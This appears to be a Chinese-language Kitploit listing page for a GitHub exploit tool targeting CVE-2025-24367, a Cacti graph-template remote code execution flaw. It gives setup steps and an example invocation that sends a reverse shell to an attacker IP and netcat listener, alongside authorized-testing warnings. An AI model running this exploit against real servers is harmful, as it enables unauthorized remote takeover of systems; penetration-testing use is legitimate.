Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2025-24367 — 经过身份验证的Cacti图形模板漏洞远程代码执行利用工具,支持反向Shell载荷及代理功能,适用于授权渗透测试。 | Kitploit
工具/GitHubGitHub/shoshinmaster/cve-2025-24367
Payload生成漏洞分析漏洞利用Web应用程序漏洞利用渗透测试学习与教育
GitHubshoshinmaster/cve-2025-24367

CVE-2025-24367

经过身份验证的Cacti图形模板漏洞远程代码执行利用工具,支持反向Shell载荷及代理功能,适用于授权渗透测试。

查看仓库
127个月前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

CVE-2025-24367 - Cacti 认证图形模板远程代码执行

使用方法与安全须知

重要 — 请先阅读:
本仓库及 exploit.py 仅用于教育和研究目的。请不要将此代码用于你未获得明确书面授权的系统、网络或服务。未经授权访问计算机系统是非法且不道德的。使用此代码即表示你同意遵守适用的法律和机构政策。


环境要求

  • Python 3.8+
root@kitploit:~
python3 -m venv venv
source venv/bin/activate
pip install requests beautifulsoup4

使用方法

root@kitploit:~
python3 exploit.py -u <username> -p <password> -i <attacker_ip> -l <listener_port> -url <target_url> [--proxy]

示例

在运行脚本之前,请确保你已启动一个 nc 监听器。除非正在进行调试,否则请勿使用代理运行脚本:

root@kitploit:~
python3 exploit.py \
  -u testuser \
  -p Welcome1 \
  -i 192.168.43.11 \
  -l 4444 \
  -url http://localhost

非常重要的警告

  • 不要针对生产系统,或任何你不拥有、未经明确授权测试的系统运行此脚本。
  • 在执行安全测试之前,务必获得书面授权。
  • 请在隔离的实验室环境(例如虚拟机、容器或专用测试网络)中进行实验。
  • 你的组织可能有报告和披露政策 — 请遵守它们。
  • 作者不对滥用此代码承担任何责任。

最后提醒: 此脚本和 README 仅供教育用途。切勿使用这些工具非法访问系统。

下载工具